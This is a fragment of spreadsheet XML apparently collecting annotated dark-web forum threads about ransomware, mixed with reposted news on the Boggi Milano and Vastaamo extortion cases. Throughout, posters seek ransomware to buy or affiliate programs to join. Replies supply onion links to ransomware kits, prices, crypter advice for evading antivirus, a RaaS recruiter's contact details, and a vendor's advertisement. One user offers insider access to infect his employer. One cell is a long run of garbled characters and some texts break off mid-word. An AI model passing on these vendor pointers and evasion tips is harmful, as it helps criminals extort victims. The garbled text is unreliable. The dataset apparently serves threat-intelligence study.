    <t>b67dbc8aba3f91554a7e</t>
  </si>
  <si>
    <t>RaaS advice</t>
  </si>
  <si>
    <t>hello fellas,;recently i have read about the big margins in raas.;normally i work solo but i dont know shit about coding, but i am pretty good in social engineering.;does somebody know how you can start with raas or can somebody hook me up ?;;thanks for the replys and stay safe.</t>
  </si>
  <si>
    <t>/u/rambam71</t>
  </si>
  <si>
    <t>23/08/2020 20:24</t>
  </si>
  <si>
    <t>81a8bfb92a4fba1017d6</t>
  </si>
  <si>
    <t>RaaS? very interesting...</t>
  </si>
  <si>
    <t>recently, ragnorak ransomware group went dark after releasing decyptor keys. looks as though they have even shut down their extortion site. seems that they may have left in a hurry. any information or ideas on why?</t>
  </si>
  <si>
    <t>User asking for more information on the ragnarock ransomware group after they went dormant for a while</t>
  </si>
  <si>
    <t>27/08/2021 22:35</t>
  </si>
  <si>
    <t>01a13783c11a35d3b37f</t>
  </si>
  <si>
    <t>Ragnarok</t>
  </si>
  <si>
    <t>0 days 06:25:00</t>
  </si>
  <si>
    <t>same as all the others, the game changed. they're not gone. the game is about to change again.;;i've stopped replying to the messages now. ransomware wannabes always the same, ask a really shitty worded question. get a polite answer saying we dislike randsomware, but still would supply if you understand the reason the cost is so high, but strongly advise they are not capable of profiting as there is an event happening of which they are unaware, and as firm believers in not scamming clients it is only fair to let them know this and suggest they save their money and freedom.;;then i get called a useless cunt.;;about 2 days later they come back and ask again.;;oricand.;;s'mesc.</t>
  </si>
  <si>
    <t>27/08/2021 23:01</t>
  </si>
  <si>
    <t>0 days 00:26:00</t>
  </si>
  <si>
    <t>if you look through my posts you'll see clearly that if i'm able to publish info i do.;;i cannot give details here.;;you are informed though. abs, raas, relationships formed by very clever russians. some action in china and american targets that have not been as open as would be sensible has changed how things work in a very short amount of time. things are going to be back, but different, not like the classic rebrand.;;sorry, there's not much that scares me, but that is the last i'll say on it. i did post on ransomware ethics. i was advised afk on certain expectations of us.;;oricand.;;s'mesc.</t>
  </si>
  <si>
    <t>28/08/2021 05:00</t>
  </si>
  <si>
    <t>0 days 01:18:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the ransomware gang exfiltrated 40 gigabytes of data from the fashion house, including hr and salary details. luxury italian men���s clothing line boggi milano has confirmed what ragnarok was already bragging about on the dark web: the brand was hit with a ransomware attack, according to multiple sources.;;ragnarok and boggi milano representatives who spoke to bloomberg agree on the facts; the ransomware attack exfiltrated 40 gigabytes of data, including human resources files and salary information. bloomberg was provided access to documents confirming the breach.;;technadu meanwhile reported that, with the help of kela, a monitoring tool for the dark web, investigators were able to look at filenames being leaked by ragnarok and found payroll files, payment pdfs, vouchers, tax documents and more. boggi milano is based in italy, and has 190 stores in 38-plus countries, according to the company, outfitting men in high-end fashion.;;no one has disclosed how much ragnarok in ransom to return the files. the boggi milano website is still up and running, and the brand said it is working with italian authorities on the matter.;;;no industry immune;;erich kron from knowbe4 said this is yet another reminder that no industry is immune from ransomware attacks.;;���although the impact to the operation of the organization appears to be minimal, the loss of roughly 40gb of data, potentially including that of customers and employees, can be a significant issue,��� kron added. ���fines from data breaches with this type of data can be significant, and as an organization that operates globally, could be imposed from multiple countries whose citizens have been impacted.���;;the number of ransomware attacks have spiked 350 percent since 2018, according to research from purplesec and criminals operating these malware groups are willing to hit anyone to make a buck ��� hospitals, schools, vaccine manufacturers and food supplies and even local governments have all bee past year.;;;���digital coal���;;���ransomware attacks are the new great digital train robbery, stealing data and crippling business through a constantly evolving attack ecosystem and malware that can evade perimeter controls,��� mark bower, a data-security expert from comforte ag said, via email.;;both a back-up strategy and a plan to stop attacks from happening are critical for any business, bower added.;;���if data is neutralized using modern data-centric techniques that enable data use in the enterprise while protected, while restricting access to the minimum live data, attackers will get the equivalent of digital coal, not data gold, and soon move on to the next vulnerable target,��� he said. ���for the enterprise, this avoids the impact of a data breach</t>
  </si>
  <si>
    <t>Article describing the ransomware attack on Boggi Milano by the Ragnarock group</t>
  </si>
  <si>
    <t>1ef79ec1f4c5f58f7e2d</t>
  </si>
  <si>
    <t>Ragnarok Ransomware Hits Boggi Milano Menswear</t>
  </si>
  <si>
    <t xml:space="preserve">���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������;���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������;;this should be posted in;/d/hacking;;january 19: an established raid forums actor, called ���kristina,��� posted a thread containing a renewed download link for a data dump, alleged to contain documents, emails, and passwords of the russian military.;;february 3: an offering to sell a 2tb array of russian databases reportedly containing russian personal information including full names, dates of birth, passport numbers, and tax information was posted to raid forums.;;february 15: a raid forums user posted a russian database for sale allegedly containing 61 million russian phone numbers.;;february 24: on the day of the russian invasion of ukraine, raid forums took an open stance in the conflict when the admin ���moot��� announced that the site would be banning all users found to be connecting to the site from russia.;;february 25: raid threat actor ���kozak888��� leaked a database belonging to a russian express delivery and logistics company, flashpoint confirmed. kozak888 claimed that the russian company provides services for the russian federal government and stated that the database leak sia���s invasion of ukraine. kozak888 revealed that the database contained 800 million records including full names, email addresses, and phone numbers.;;february 25: a user posted a thread requesting assistance in creating fake identification documents, allegedly in order to assist a friend escape ukraine and find refuge in neighboring moldova.;;february 25: a user posted a thread encouraging users to begin collecting attackable ranges of russian ip addresses.;;______________________________________________________________________________________;;;as stated earlier, it is unclear which authority is behind this incident however lately european and russian authorities have been quite active in seizing hacking and cybercrime forums. on january 18, 2022, europol took down the vpn service vpnlab used by ransomware operators.;;on october 5, 2021, european law enforcement busted a ransomware gang in ukraine that was behind attacks on more than 100 companies across the globe. on june 30th, 2021, authorities m to seize the web domains, customer logs, and server infrastructure of a double-encryption service for cybercriminals called doublevpn.;;on january 15th, 2022, russia���s top agency fsb (federal security service) not only dismantled the infrastructure of the revil ransomware gang but also arrested 14 suspects.;;on january 24th, 2022, russian authorities managed to arrest 4 members of the infamous infraud organization hacking group. the organization was labeled as the dark web���s largest cybercrime group after being indicted for stealing $530 million in different scams.;;on february 8th, 2022, russian police seized 4 more cybercrime domains including trump dumps, ferum, skyfraud carding forum, and uas (ultimate anonymity services), </t>
  </si>
  <si>
    <t>Post containing various instances of law enforcement shutting down services related to ransomware attacks</t>
  </si>
  <si>
    <t>13/03/2022 10:32</t>
  </si>
  <si>
    <t>111c8ff848fab50e6623</t>
  </si>
  <si>
    <t>Raid forums NIT</t>
  </si>
  <si>
    <t>0 days 10:03:00</t>
  </si>
  <si>
    <t>{'revil': 1, 'ransomware': 3}</t>
  </si>
  <si>
    <t>search in the main markets;/d/whitehousemarket;,;/d/dark0dereborn;,;/d/worldmarket;,;/d/darkfox;... ransomware;many vendors</t>
  </si>
  <si>
    <t>User asking where to buy custom ransomware</t>
  </si>
  <si>
    <t>/u/kratom2020</t>
  </si>
  <si>
    <t>29/08/2021 00:04</t>
  </si>
  <si>
    <t>a99f58098218cb9aa1b1</t>
  </si>
  <si>
    <t>Ramsomeware Custom</t>
  </si>
  <si>
    <t>0 days 02:49:00</t>
  </si>
  <si>
    <t>0 days 04:00:00</t>
  </si>
  <si>
    <t>can ransomware be made with python?, or is it better to be done with c ?</t>
  </si>
  <si>
    <t>User asking if ransomware can be made in Python</t>
  </si>
  <si>
    <t>/u/Moonann_</t>
  </si>
  <si>
    <t>25/04/2020 21:59</t>
  </si>
  <si>
    <t>db2a52c62e7ab52c62ce</t>
  </si>
  <si>
    <t>Ramsomware with python</t>
  </si>
  <si>
    <t>18 days 23:13:00</t>
  </si>
  <si>
    <t>the key lies in the way of encryption and decryption and the target environment. the language of programming is not important.</t>
  </si>
  <si>
    <t>/u/GucciWayne</t>
  </si>
  <si>
    <t>25/04/2020 22:25</t>
  </si>
  <si>
    <t>you can code a ransomware in all languages.;you can't code a good ransomware in all languages.;;python is too high level (performing low level tasks is really important for a malware), can be easily reversed, create huge executable and things as polymorphism in python are like really hard to do because python is just not adapted for malware dev.;;(python code -&gt; py2exe | pyinstaller... -&gt; 2tb executable).;;many people will say "look i already did a ransomware in python", yes ok but,;you didn't really code it, you just imported some libraries you don't really understand to perform stuff as encryption.;(i know that in all language we just basically call some functions from ntdll (for windows) but that is a metaphor).</t>
  </si>
  <si>
    <t>/u/Souu_l</t>
  </si>
  <si>
    <t>25/04/2020 22:29</t>
  </si>
  <si>
    <t>just because there are some news articles about someone's work that is written in python doesn't mean that it is at all good.. it is very easy to get source from an exe that you got from py2exe. python is a lot slower and more used as a proof-of-concept language. rather you would want to make something as a ransomware in a much lower level language. for example, i have seen people bragging about their python ransomware that took over 30 minutes just to get all the files from userprofile (desktop, documents etc) guess how long it took my low level ransomware to get all the files from (c drive (500gb ssd) and d drive (2 tb), it surely didn't take 30 minutes it took just 2 minutes to index every file; i have about 400 gb on the ssd used and about 1 tb on the hdd. it would take about another 30 seconds to encrypt everything with authenticated aes and rsa. so the whole ransomware run would take about 2 minutes and 30 seconds.. whereas a python ransomware would take a lot more time to just index from a silly userprofile.</t>
  </si>
  <si>
    <t>/u/KaraokeBitch</t>
  </si>
  <si>
    <t>25/04/2020 23:00</t>
  </si>
  <si>
    <t>i use ransomware coded in python from time to time and it works perfectly fine. i don't use py2exe but i'm able to get my executable &lt;3mb and i specifically target individuals for higher payouts. i'm not worried about it being reversed engineered since i'm not spamming it to the masses. i prefer a slower career ;);;whoever is saying that you can encrypt all essential files in 2 minutes is not true. maybe if it's just pictures or something like that i guess. how long does it take you to encrypt your hd? it's definitely not 2 minutes. crypting their files is a process just like any other. shit takes time.;;depending on the amount of files, what type of files, and how big the files are dictates the encryption time of them. so this isn't happening as quick as some of you may think it does regardless of what it's coded in.;;i target specific people of value. sometimes they have larger files that need to be encrypted. i wait until there's idle time on the machine &gt;5 minutes and begin the process. idle time of &gt; 60 minutes i have it coded to begin asap given the user has probably left their machines and it's safe(ish) to say you can use more of their computers resources without being noticed.;;doesn't matter what it's coded in as long as it works. python is great for so many other things though</t>
  </si>
  <si>
    <t>25/04/2020 23:13</t>
  </si>
  <si>
    <t>i bought ransomware source code in python and have had mediocre success with it but it works on windows 10 with no problems with av?;;ok sure it won't encrypt everything in 30 seconds but it completely encrypts a windows 10 machine in 1-2 minutes which i don't think is too bad considering the size of some of the files.;;point is do whatever works whether that's c, c+, java, python, etc.;;if you're able to code your own in any language is much better then relying on others to sell it to you</t>
  </si>
  <si>
    <t>/u/Modafukaa</t>
  </si>
  <si>
    <t>25/04/2020 23:59</t>
  </si>
  <si>
    <t>the very successful ransomware such as ryuk revil and gand crab are using c, c++ and c#. python is too slow for encryption and will be detected by av.</t>
  </si>
  <si>
    <t>/u/M0neyplayer</t>
  </si>
  <si>
    <t>26/04/2020 00:03</t>
  </si>
  <si>
    <t>hello, guys i working in a not so small company. we have around 500 labour workers and they are just not right to that people. can someone help me to put them ransomware on pc and take money from them. i can have access to put usb in one of the computers or to give you email on which you can send it or how this thing works.. i dont know .. any help pm me, becuase this post is different subject but i dont know with who to speak about that,,</t>
  </si>
  <si>
    <t>/u/voor</t>
  </si>
  <si>
    <t>26/04/2020 16:22</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;���your psychotherapy patient records will be published unless you pay me ���500 in cryptocurrency within 48 hours���. a little less than 1% of the finnish population received this demand within the last two weeks.;;multiple potentially unrelated individuals have gained access to ���vastaamo��� psychotherapy centres which treated around 40.000 patients primarily in oulu and tampere. the hackers exploited a security breach of 2018 and early 2019 which seems to not have been extensively reported to authorities or the general public.;;individuals' deeply intimate psychotherapeutic records became ammunition to blackmail and extract funds from both the hospital management and patients. companies internal investigation, which is still in progress, found deficiencies in information security. this led to the board of directors terminating the ceo of vastaamo ville tapio. the vastaamo hack makes the attack the biggest ransom demand targeting a medical fabe a member of a larger but undisclosed organized group that regularly steals data for the purpose of extracting ransom payments. the delay between the security breach in 2018 and the blackmail attempts that surfaced more than two years later on october 21th 2020, has been explained with their��� ���heavy workload��� and the fact that it took the group a while to decode finnish documents and understand their value.;;for sometime it has been unclear whether or not the treatment center paid the ransom. there has been a claim on reddit that vastaamo management has paid the ransom - which they claim that they didn���t. users claimed in a thread called ���slightly interesting: the office seems to have paid the ransom��� was provided along with a bitcoin address of the supposed ransomer, 37czpdzbsg8s8nmf85d5xn7d9hfff3t3ia. user indicated a cryptocurrency wallet address 37czpdzbsg8s8nmf85d5xn7d9hfff3t3ia that has moved 40 btc (the ransom amount demanded from the management) in a stion was made public.;;the author's internal investigation concluded that this address is being associated with the platform ftx. the funds of 40 btc arrived at the ftx associated wallet from a provider called deribit.  according to the best knowledge and abilities of the author those platforms have not been connected to this ransom request and those funds are not related to the case or simply - this claim is fake news.;;as of today, patients have been threatened with blackmail unless they paid about up tp ���500 to a unique cryptocurrency wallet and sent a confirmation email to a dedicated address. the hackers have used a ���cryptocurrency deposit provider��� that sends notifications to the attackers once funds are received to keep track of thousands of desired payments.;;in the meantime cybersecurity companies have joined forces with blockchain analytics providers to trace and identify the suspects. the individual or group of individuals who claim to be responsible for this data extractionlly vocal about it on a deep web forum, which they used to release more than 300 individual patient records to the general public and threatened to release more in case patients would not pay the ransom.;;���this case upsets me as a human being because it is morally wrong to target members of the society who require psychological support. for now, we have created a landing page where ransomware victims can share with us information as well as which cryptocurrency wallet address they have been asked to send the money to. we can not release much due to the case being under investigation but we have clusters, indications and won���t rest until the funds will be traced and those responsi" - sven martinsson, ceo, valega chain analytics;;a finnish cryptocurrency broker has identified and stopped payments;;in the emails the attackers have suggested using the cryptocurrency exchange provider called bittiraha to conduct the payment. the provider itself has been able to spot ransom payment attempts, block significant amounts of payments and send the money back to the victims as vestamo, doesn���t recommend to pay the ransom on their official website. despite the refunds the platform has been able to collect the cryptocurrency wallet addresses provided by the scammer that might be used for further investigation. experience from recent twitter hacks shows that the likelihood of recovering funds increases when victims provide the attacker���s cryptocurrency wallet addresses and allow companies to systematically trace it back.;;it remains unclear whether the hacker worked individually or if there have been different individuals involved at different stages of the attack. a member of law enfrsonal details remain with the author) that works closely to the investigation, indicated that there is a high possibility that there have been multiple participants involved in this case. potentially one individual accessed the systems to extract the data back in 2018 or 2019 a second one received access to the database as well as demanded ransom from the management. the third used the same database to try extort ransom from the patients. there is also a suspicion that different hackers were piggy-backing on each other���s data.;;one indication for cooperation has been a post on darknet in english and requesting help from users with translating emails from english to finnish. as victims received emails in finnish which were personalized to the receivers��� gender-based on decoding the finnish social security number. this indicates a finnish speaking accomplice, at the least.;;a history of data breaches at vastaamo;;data breaches seem to be nothing new to vastaamo management as they happened multi the past. it is likely that the company knew about the leak but didn���t notify patients or the general public extensively enough to take countermeasures until lately.;;���extensive cooperation of law enforcement agents with blockchain analysis companies, europol and cybercrime centers allows us to build effective tools for the prosecution of cybercrime. it is crucial to alert us as soon as possible. it is up to my finnish colleagues to judge, but it seems like the period between the discovery of the data breach to the time when the cybersecurity center has been alerted could most probably have been shorter. we can���t help the victim, or others from becoming victims when we are" - jan olsson, police superintendent, swedish cybercrime center sc3;;after the second data breach in 2019 ���vastaamo��� launched an internal investigation with the finish cybersecurity provider nixu, what has not been disclosed yet.;;hacker releases the full data by accident;;it is not yet known what the full scope of the leaked data is, so the amount of affected individuals might yet not be certain. however for a few morning hours the hackers made a large file with more than 10 gb of data available instead of a file limited to the data of the 300+ patients mentioned in the threat. this is believed to be done by mistake while uploading a wrong file to its server.;;due to very slow download speeds on the tor network, it seems that no source was able to download the full file before the hackers discovered the mistake, while removing it. the mistake could not only expose the full scope of available data, but be costly for the attackers. as releasing the data would lead to individuals not being willie ransom.;;while bragging about the way of accessing the data on the darkweb, the crackers have claimed that the patient data has been previously stored on a public server with easily identifiable default root passwords. in case this is true, this should ring the alarm bells of all health care providers as very little specialized knowledge would be needed to access the data.;;"for years, the assumption has been that for-profit online criminals are not targeting health facilities, as they are going after financial targets instead. this has now changed. before the internet revolution, protecting health information was simple as it was on paper. now health information is data, and we need to be able to protect it for years, for decades.���;;unfortunately, despite an extensive investigation and discussion of the case in the finnish parliament, this story may have another unfortunate twist in the future, harming victims even more.;;not only health records, but also social security numbers, addresses, emails and phone numbers have been released, which can lead to a potential wave of identity theft and fraud. there is a possibility that other fraudsters may try to use the data to purchase gift cards or other items of low value using the social security number, address and personal information of victims using buy-now-pay-later providers.;;klarna has already released a statement offeictims to block all purchases - a small step into a right direction. as the data already leaked and is publicly available, it is important to act now to prevent further damage, rather than wait for another lengthy investigation by the finnish parliament that will be too little, too late.;;final notes:;;as the case remains under investigation by the finnish cyber ������security center, the finnish national supervisory authority for welfare and health, and the data protection commissioner some details available to the author of this article have not been released to not jeopardize the progress of the in</t>
  </si>
  <si>
    <t xml:space="preserve">Article regarding a ransomware group that is using psycotherapy medical records for blackmail </t>
  </si>
  <si>
    <t>b8f92f3ca29eeafaac75</t>
  </si>
  <si>
    <t>Ransom Hackers In Finland Are Using Psychotherapy Medical Records As Ammunition</t>
  </si>
  <si>
    <t>as you may have heard a few weeks ago, the lazion region was victim of a ransomware attack from ransomexx.;;https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/;;the istitutions have declared that no ransom has been paid and the data has been recovered.;the strange things is that no leaks have come out, does anyone have informations?</t>
  </si>
  <si>
    <t>Post describing a ransomware attack on the Lazio region in Italy by the RansomExx ransomware strain</t>
  </si>
  <si>
    <t>/u/Skyl3r</t>
  </si>
  <si>
    <t>18/08/2021 23:37</t>
  </si>
  <si>
    <t>/d/IntelExchange</t>
  </si>
  <si>
    <t>59ac02e1d5b4eed8e728</t>
  </si>
  <si>
    <t>RansomEXX and Italy's Lazio region</t>
  </si>
  <si>
    <t>16 days 00:57:00</t>
  </si>
  <si>
    <t>http://rnsm777cdsjrsdlbs4v5qoeppu3px6sb2igmh53jzrx7ipcrbjz5b2ad.onion/;;well this is there official webpage to leak stuff.. i cant find any leak for the lazion region</t>
  </si>
  <si>
    <t>/u/Steamwarriors12</t>
  </si>
  <si>
    <t>19/08/2021 00:30</t>
  </si>
  <si>
    <t>from the article bc updated:;;--  after posting our article, italian security researcher jameswt stated that there is evidence in italy that the attack was conducted by lockbit 2.0 but could not share further information.</t>
  </si>
  <si>
    <t>/u/wafferstats1</t>
  </si>
  <si>
    <t>15 days 08:36:00</t>
  </si>
  <si>
    <t>looking for custom made ransomware, please no jokers.;;pm only.</t>
  </si>
  <si>
    <t>User asking for custom made ransomware</t>
  </si>
  <si>
    <t>23/10/2019 23:05</t>
  </si>
  <si>
    <t>a98742687ed6523cf835</t>
  </si>
  <si>
    <t>Ransomeware</t>
  </si>
  <si>
    <t>anyone know where i can pickup a ransomware that i do not need to host a c&amp;c server. i had stampado at one point but i cant find my old creator and i can not find a working stampado to purchase it again.</t>
  </si>
  <si>
    <t>/u/qdiKmbx9</t>
  </si>
  <si>
    <t>25/03/2018 02:02</t>
  </si>
  <si>
    <t>24e3e001a6006238</t>
  </si>
  <si>
    <t>Ransomware</t>
  </si>
  <si>
    <t>you're actually asking for advice on how to fuck-over random people?  particularly ransomware?  here's an idea...go fuck yourself.  you're a complete waste of space.  the dna which encodes you would have been better spent on the mold which gives cheese its flavor.</t>
  </si>
  <si>
    <t>/u/printerpam</t>
  </si>
  <si>
    <t>25/03/2018 02:08</t>
  </si>
  <si>
    <t>/u/tactics420;not really.. to blatantly call it "ransomware", it's obvious the outcome. i'm 2 minds about carding and phishing. i wouldnt do it myself and laugh at the attempts (to do it to me). if they are successful, nobody looses as it's covered by the bank due to fraud, but they are inconvenienced temporarily for being an idiot.;;"ransomware" is a whole different level of bottom feeding cunt</t>
  </si>
  <si>
    <t>/u/EddieHitler</t>
  </si>
  <si>
    <t>25/03/2018 02:20</t>
  </si>
  <si>
    <t>bonjour,;;je recherche des partenaires qui travaillerez dans une grosse boite, pour installer des ransomware avec un tres bon %, contacter moi en priv�</t>
  </si>
  <si>
    <t>/u/DrSpam</t>
  </si>
  <si>
    <t>15/03/2020 13:18</t>
  </si>
  <si>
    <t>/d/DarkNetFrance</t>
  </si>
  <si>
    <t>8dcd2fb3f2b9c5b26675</t>
  </si>
  <si>
    <t>any success using ransomware? any open source or leaked code working right now? any forums dedicated to it?</t>
  </si>
  <si>
    <t>/u/dodecagon</t>
  </si>
  <si>
    <t>14/09/2020 07:32</t>
  </si>
  <si>
    <t>10397d3e5f81106a5587</t>
  </si>
  <si>
    <t>10 days 04:35:00</t>
  </si>
  <si>
    <t>ranion is by far the cheapest you can find it here: http://ranionjgot5cud3p.onion;;good staff and all around nice very simple and easy to use.... free c&amp;c server and no fees taken? well it must be a dream come true because for $120 worth of btc for basic features it's amazing.;;need a crypter to keep it fud? they have one or aspire crypt aka aspire refresh is a great choice. you can find it on hackforums but you should just pay $10 less and get the ranion crypter. (3 months for aspire and a pvt stub is $100 or $90 for ranion).</t>
  </si>
  <si>
    <t>/u/MrRansom47</t>
  </si>
  <si>
    <t>24/09/2020 12:07</t>
  </si>
  <si>
    <t>9 days 01:01:00</t>
  </si>
  <si>
    <t>uhmm a ransomware for 10$ ? lol you can even find for free on github , but i doubt it will do the job;;good ransomware are sold around 200$ up to 1,500 $;;bought mine from whm for 250$ , working like a charm</t>
  </si>
  <si>
    <t>/u/django777</t>
  </si>
  <si>
    <t>24/03/2021 15:28</t>
  </si>
  <si>
    <t>cf5b8ef0e0fb92b67b5f</t>
  </si>
  <si>
    <t>3 days 12:34:00</t>
  </si>
  <si>
    <t>24 days 03:59:00</t>
  </si>
  <si>
    <t>is it fud ?</t>
  </si>
  <si>
    <t>29/03/2021 01:12</t>
  </si>
  <si>
    <t>4 days 09:44:00</t>
  </si>
  <si>
    <t>hello guys, not sure if this is the right place to post this but i need a ransomware for very legit delivery method i stumbled upon. i understand some ransomware gangs  have affiliate programs, i need help getting onto one of them.</t>
  </si>
  <si>
    <t>22/11/2021 06:39</t>
  </si>
  <si>
    <t>024c7e182f72f6454247</t>
  </si>
  <si>
    <t>8 days 08:49:00</t>
  </si>
  <si>
    <t>check out my ransomware - redeemer available on;/d/redeemer;.;it's free to use and low fee (20% of ransom) for decryption.;it's made in c++ and has no dependencies.;it uses safe algorithms and has a pretty sophisticated encryption scheme.;;redeemer itself doesn't use internet at all, it doesn't forbid vm or sandboxie usage and it should work with most crypters.;i also, as the only developer, gather no logs or anything from my affiliates and i don't forbid attacking any target (based on geo or business type).</t>
  </si>
  <si>
    <t>22/11/2021 10:53</t>
  </si>
  <si>
    <t>contact information:;;xmpp: raas@31337.life | raas@strong.pm;;tox : d1274bec5b1c6d770ff7bcf3d73cddd4f00f316a59817db90108b5c1f4d80645d282247640b1;;if you want to partner with us you must have access to core server.;;you will have to let us know:;;- the name of the business or company, we are not playing guesswork.;- the type of access that you have (user, admin) and describe your access.;whether you have rdp and what it is (installed and used by the victim or hidden, installed by you).;if there are any problems with access, it's a good time to specify them as well.;- provide some screenshots showing your access. show the product face, don't ask me what you want to see in the screenshot.</t>
  </si>
  <si>
    <t>/u/Partnership</t>
  </si>
  <si>
    <t>30/11/2021 15:28</t>
  </si>
  <si>
    <t>8 days 04:35:00</t>
  </si>
  <si>
    <t>is discused about ransomware allowed in this sub?</t>
  </si>
  <si>
    <t>/u/zazarufus</t>
  </si>
  <si>
    <t>17/01/2022 14:22</t>
  </si>
  <si>
    <t>c66e09646e6e6fa32444</t>
  </si>
  <si>
    <t>18 days 23:29:00</t>
  </si>
  <si>
    <t>yes it is but you won't get good results if you're just asking people to give you some etc.</t>
  </si>
  <si>
    <t>17/01/2022 15:15</t>
  </si>
  <si>
    <t>like, is better use bitcoin or monero to victim payment?</t>
  </si>
  <si>
    <t>17/01/2022 22:05</t>
  </si>
  <si>
    <t>where does one buy the latest ransomwares?</t>
  </si>
  <si>
    <t>/u/synth1777</t>
  </si>
  <si>
    <t>18/01/2022 00:01</t>
  </si>
  <si>
    <t>it's literally the place to discuss about it, what's your question ?</t>
  </si>
  <si>
    <t>/u/Ninjaa55</t>
  </si>
  <si>
    <t>19/01/2022 20:27</t>
  </si>
  <si>
    <t>1 days 16:35:00</t>
  </si>
  <si>
    <t>what the books you recommended to learn about virus,malware,worm and ransomware?</t>
  </si>
  <si>
    <t>20/01/2022 01:56</t>
  </si>
  <si>
    <t>0 days 05:29:00</t>
  </si>
  <si>
    <t>i wouldnt recommend books to learn, trying is the real skills, buy a burner try to achieve something (hack your neighbor, hack a vm you made etc..) and you have google and darknet to find how to do, you'll learn faster this way, jump in the river and learn to swim.</t>
  </si>
  <si>
    <t>16 days 05:36:00</t>
  </si>
  <si>
    <t>what about the little black book of computer virus, are you ever readed?</t>
  </si>
  <si>
    <t>0 days 06:19:00</t>
  </si>
  <si>
    <t>guys ransomware is taking off in 2022 and gangs from all around the globe are getting rich quick. but how does it even work and where to even get started. you gotta buy or create your own malware with source code, either buy from a trusted vendor like stormous ransomware or cronoz ransomware  or conti locker where millions are getting funneled threw xmr or btc straight to bank account its crazy! any target is weak with encryption! so either buy or create  your own exploit ! hope this helped</t>
  </si>
  <si>
    <t>/u/Malwareboss</t>
  </si>
  <si>
    <t>31/03/2022 18:37</t>
  </si>
  <si>
    <t>df3a6f02b1bded7ec9ae</t>
  </si>
  <si>
    <t>5 days 23:05:00</t>
  </si>
  <si>
    <t>just wondering, how much did these ransomware source codes cost? cos i was actually able to get a legit ransomware for free.</t>
  </si>
  <si>
    <t>31/03/2022 23:09</t>
  </si>
  <si>
    <t>there r legit ransomware venders but i dont know any of them on dread,  look up a group that hit a certain pipeline. you're not far off. but i would look up github repos that can help you that way you understand it.</t>
  </si>
  <si>
    <t>0 days 03:53:00</t>
  </si>
  <si>
    <t>https://share.vx-underground.org/conti/</t>
  </si>
  <si>
    <t>not much, they all just ended up being older outdated github codes that wont do any good now.</t>
  </si>
  <si>
    <t>i'm in need of an intermediate ransomware and graphic panel</t>
  </si>
  <si>
    <t>/u/n000xy</t>
  </si>
  <si>
    <t>0db9d5ca6b5f69ee32ff</t>
  </si>
  <si>
    <t>54 days 19:01:00</t>
  </si>
  <si>
    <t>this is not the place to ask for such things, but who are you and why do you need? talk in pm.</t>
  </si>
  <si>
    <t>0 days 09:00:00</t>
  </si>
  <si>
    <t>ive got one available. pm if you are interested. it has a gui and a database that stores all the keys on a remote website. so when you get a payment your pal sends you his machine id and you just go to your admin panel and get the decryption key. the gui is shown after the computer is infected. it has all the instructions that you need along with a timer that doubles the price after a set interval</t>
  </si>
  <si>
    <t>/u/plaguerat</t>
  </si>
  <si>
    <t>29/07/2022 09:49</t>
  </si>
  <si>
    <t>54 days 10:01:00</t>
  </si>
  <si>
    <t>hi, i am looking for ransomware. i already have the infastructure to spread it. please pm me to point me in the right direction or if you have some. i will not be paying for it because it needs to be constantly kept fud however will do a % split.</t>
  </si>
  <si>
    <t>User looking for ransomware/ raas</t>
  </si>
  <si>
    <t>/u/rocknroll123</t>
  </si>
  <si>
    <t>3e345bb3df206de6775d</t>
  </si>
  <si>
    <t>Ransomware (looking)</t>
  </si>
  <si>
    <t>16 days 00:21:00</t>
  </si>
  <si>
    <t>i have mine already, so spread, you will get 20% of proceed  that comes in. do not ask me to change address to your else buy your own</t>
  </si>
  <si>
    <t>0 days 01:31:00</t>
  </si>
  <si>
    <t>take a look at:;http://darkcorqvqcj3p3g.onion</t>
  </si>
  <si>
    <t>20/03/2020 22:45</t>
  </si>
  <si>
    <t>10 days 03:20:00</t>
  </si>
  <si>
    <t>constantly kept fud however will do a % split.;;you should quit while your a head.</t>
  </si>
  <si>
    <t>26/03/2020 18:15</t>
  </si>
  <si>
    <t>5 days 19:30:00</t>
  </si>
  <si>
    <t>22/11/2021 05:57</t>
  </si>
  <si>
    <t>c64e1a4c4d6ddc3e9632</t>
  </si>
  <si>
    <t>Ransomware Affiliate</t>
  </si>
  <si>
    <t>i believe dark.fail has a website where you can buy a ransomware program so you can send it out and get people with it. i forgot the website that has it but you look through it you will find it.</t>
  </si>
  <si>
    <t>/u/unkn0wn_</t>
  </si>
  <si>
    <t>22/11/2021 06:15</t>
  </si>
  <si>
    <t>anyone have a link on where to find information on ransomware affiliate deals or able to assist in the deployment ? i am happy to chat with anyone who can provide some help.;;whilst forum links are also good feel free to reach out to me personally but if you fit the description. i will not personally correspond with anyone who doesn't have a scope / history of posting on here though as it is highlyp orbable that you are full of shit.</t>
  </si>
  <si>
    <t>/u/herbert111</t>
  </si>
  <si>
    <t>ce48c55115c388ebb44c</t>
  </si>
  <si>
    <t>Ransomware Affiliates</t>
  </si>
  <si>
    <t>18 days 05:39:00</t>
  </si>
  <si>
    <t>affiliate deals? you contact the raas devs yourself or get on a recruitment thread over at ramp.</t>
  </si>
  <si>
    <t>ramp? what's that, a sub?</t>
  </si>
  <si>
    <t>it's a forum, formerly payloadbin, created by babuk's admin. discussions on ransomware are allowed and even enforced there while established places like exploit and xss have banned those topics.</t>
  </si>
  <si>
    <t>isn't ramp russian only website?</t>
  </si>
  <si>
    <t>0 days 01:19:00</t>
  </si>
  <si>
    <t>it is, like the majority of good cybersec sites.</t>
  </si>
  <si>
    <t>too bad, do you know any good forum other than cryptbb in english that allows ransomware talks?</t>
  </si>
  <si>
    <t>all the main ransomware affiliate groups are russian only and you need to be a very established pt too.;;everyone else i have met just has access to something they found on github or one of the random low level wares they found on a forum, and they're trying to get you to do all the work in hopes you'll eventually hit some unpatched win98 system or something.;;however, if you have some really good spreading vectors or access then pm me and maybe i can sort something out.</t>
